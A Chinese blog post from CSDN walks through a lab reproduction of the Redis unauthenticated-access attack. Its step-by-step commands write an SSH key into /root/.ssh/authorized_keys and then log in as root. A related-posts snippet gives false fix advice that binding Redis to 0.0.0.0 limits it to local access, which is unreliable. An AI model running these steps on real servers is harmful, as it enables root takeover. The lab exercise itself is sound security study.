Redis未授权访问漏洞利用实验

最新推荐文章于 2024-05-09 00:07:21 发布
最新推荐文章于 2024-05-09 00:07:21 发布
阅读量188 收藏
点赞数
分类专栏: 初学 复现 漏洞 文章标签: redis 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Mrs_H/article/details/115442350
版权
复现 同时被 3 个专栏收录
31 篇文章 3 订阅
订阅专栏
初学
9 篇文章 0 订阅
订阅专栏
漏洞
7 篇文章 0 订阅
订阅专栏

Redis未授权访问漏洞利用实验

漏洞描述

Redis在默认的情况下,会绑定在本地的6379端口上,如果没有采用相关的防火墙策略,就会将Redis服务暴露在公网上;

对Redis配置不当将会导致未授权访问漏洞,从而被攻击者利用。在特定条件下,如果Redis以root身份运行,攻击者可以用root权限的身份写入ssh公钥文件,并通过ssh的方式远程登陆目标服务器,进而导致服务器权限被获取或者是信息泄露等一系列安全问题。

实验环境

Ubuntu18(靶机)
kali2020.1(攻击机)

实验条件

首先,要保证目标机器上安装有redis服务,以及ssh服务,并确保两者都是开启状态。同时,有需要的情况下还应当修改靶机上的ssh配置文件使其允许无密钥的登录;同时,在redis的配置文件中也应当将将protected-mode的那一行设置为no

实验过程

首先,通过redis 的命令连接到目标的redis 的服务上,然后再用info命令检验未授权访问漏洞是否存在。

redis-cli -h x.x.x.x
info

在这里插入图片描述
在这里可以看到是能够得到信息的,所以说靶机上的redis服务是存在未授权访问漏洞的。
咱们的目标是要利用这个漏洞然后连接到靶机所以需要现在本机上生成一个ssh的公钥

ssh-keygen -t rsa

在这里插入图片描述
然后将生成的密钥保存到本地的一个文件中

(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > key.txt

在这里插入图片描述
将公钥写入靶机的redis缓存中

cat key.txt | redis-cli -h 192.168.59.132 -x set xxx

在这里插入图片描述
然后更改配置文件,查看一下公钥是否已经导入靶机中。

config set dir /root/.ssh
config set dbfilename authorized_keys
save

在这里插入图片描述
然后开启靶机的ssh服务用刚才在生成密钥时在passphrase中输入的密码进行登录,这里我用的就是空密码。

ssh root@192.168.59.132

在这里插入图片描述
成功用ssh连到目标机器并获得root权限。试验结束

入山梵行
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
关于Redis授权访问漏洞利用的介绍与修复建议
01-21
前言 本文主要给大家介绍了关于Redis授权访问漏洞利用的相关内容,文对该漏洞进行了详细,并给出了相对应的修复/安全建议,下面话不多说了,来一起看看详细的介绍吧。 一、漏洞介绍 Redis 默认情况下,会绑定在 0.0.0.0:6379,这样将会将 Redis 服务暴露到公网上,如果在没有开启认证的情况下,可以导致任意用户在可以访问目标服务器的情况下授权访问 Redis 以及读取 Redis 的数据。攻击者在授权访问 Redis 的情况下可以利用 Redis 的相关方法,可以成功在 Redis 服务器上写入公钥,进而可以使用对应私钥直接登录目标服务器。 漏洞描述 部分 Redis
Redis授权访问配合SSH key文件利用详解
09-09
主要给大家介绍了关于Redis授权访问配合SSH key文件利用的相关资料,文通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧
redis授权访问漏洞(三种方法)
网安小白的博客
08-30 4720
redis授权访问复现,含写入webshell、linux计划任务反弹shell、写入ssh公钥实现ssh登录三种方法~
Redis授权访问漏洞利用
weixin_65049289的博客
01-17 472
Redis授权访问漏洞
Redis授权访问漏洞复现与利用
Forget_liu的博客
06-07 2379
Redis 默认情况下,会绑定在 0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下授权访问 Redis 以及读取 Redis 的数据。
Redis授权访问漏洞的重现与利用
qq_40882763的博客
03-24 1832
Redis 默认情况下,会绑定在 0.0.0.0:6379,,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下授权访问 Redis 以及读取 Redis 的数据。
Redis授权访问漏洞引出的漏洞利用方式
Chu_Jian_Xiong的博客
11-20 1106
redis授权访问漏洞一个由于redis服务版本较低其设置登录密码导致的漏洞,攻击者可直接利用redis服务器的ip地址和端口完成redis服务器的远程登录,对目标服务器完成后续的控制和利用。
Redis 授权访问漏洞利用及修复
Thunderclap的博客
06-25 3862
Redis 授权访问漏洞利用及修复
Redis授权访问漏洞搭建复现
m0_58595840的博客
01-05 2702
Redis授权访问漏洞利用方式总结(含靶场搭建)
Redis授权访问漏洞详解(全面)
m0_64481831的博客
02-26 1887
Redis是一款内存高速缓存的数据库,是一款K-V型数据库,它的所有键值都是用字典来存储的。其它的value支持多种数据类型,包括String、List、Set、Zset和Hash。Redis默认情况下绑定在127.0.0.1:6379,在没有进行采用相关的策略,如添加防火墙规则避免其他非信任来源ip访问,就会将Redis服务暴露在公网上;并且Redis默认情况是空密码连接在服务器以root身份运行Redis时这将导致任意用户可以访问目标服务器下授权访问Redis以及读取Redis数据。
Redis授权访问漏洞实验
qq_60256199的博客
10-09 3022
Redis一个开源的内存数据库管理系统,它被广泛用于缓存、消息队列和实时数据分析等应用场景。Redis支持多种数据结构,包括字符串、列表、集合、有序集合和哈希表,可以通过简单的键值对方式存储和检索数据。由于其高性能和低延迟特性,Redis常用于加速数据访问,提高应用程序的响应速度。此外,Redis还提供了持久化选项,允许数据在重启后仍然可用,使其适用于各种持久性存储需求。这一特性使得Redis成为了一个非常强大的数据存储和缓存解决方案,特别适用于需要快速读写操作的应用场景。
Redis授权访问漏洞实战
yuan_boss的博客
09-01 1290
​ 本文章主要是针对于vulhub靶场Redis 4.x/5.x 主从复制导致的命令执行进行复现,部分复现步骤可以参考vulhub靶场,这里我提供了利用POC工具验证的步骤,相比vulhub更加详细简单。漏洞原理Redis授权访问在4.x/5.0.5以前版本下,我们可以使用master/slave模式加载远程模块,通过动态链接库的方式执行任意命令。本篇文章需要用到的工具下载地址在复现授权访问漏洞之前,我们有必要先大致的了解一下Redis是什么,Redis的简单使用与Redis授权访问漏洞的危害。
数据库安全:Redis 授权访问漏洞 测试.
网络安全领域___专研者.
05-27 1475
Redis 默认情况下绑定在 6379 端口,然后如果没有进行添加防火墙规则避免其他非信任来源 IP访问等相关安全策略,直接暴露在公网上。然后再没有设置密码或者设置了弱密码,因此导致此漏洞的产生.
漏洞复现之Redis授权访问
m0_56190544的博客
09-13 1241
本文详细介绍了redis授权访问漏洞的原理以及利用方法,供大家参考学习
Redis授权访问
最新发布
npc88888的博客
05-09 1142
在 Reids 4.x 之后,Redis新增了模块功能,通过外部拓展,可以实现在redis实 现一个新的Redis命令,通过c语言编译并加载恶意.so文件,达到代码执行的目的。更改目标服务Redis备份路径为ssh公钥存放目录(一般默认为/root/.ssh):config set dir /root/.ssh。原文链接:https://blog.csdn.net/weixin_45605352/article/details/118790775。进入/root/.ssh目录: 将生成的公钥保存到。
redis授权访问漏洞
热门推荐
jiji_king的博客
07-07 1万+
个人笔记
Linux系统(centos7)常见安全风险 问题处理 漏洞修复
qq_49001876的博客
03-20 6155
服务器安全维护是项目上线后必不可少的一环,安全扫描出的风险大致分为系统风险、软件包版本漏洞、应用版本漏洞、应用风险、账号风险等五类,文与大家分享了维护过程的常见问题。 关键词:安全扫描 漏洞修复 系统风险 应用风险 账号风险 yum升级 tomcat升级 运行权限检查 普通用户启动 设置密码尝试次数
redis授权访问漏洞修复
11-03
为修复Redis授权访问漏洞,可以采取以下措施: ``` 代码块1: 1. 修改redis.conf配置文件,将bind 127.0.0.1改为bind 0.0.0.0,这样Redis只会监听本机的IP地址,而不是所有的IP地址。 2. 设置Redis密码,可以在redis.conf配置文件设置requirepass参数,或者在Redis启动后使用config set命令设置。 3. 使用iptables等防火墙软件,限制Redis服务只能被信任的IP地址访问。 ``` 相关问题:

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值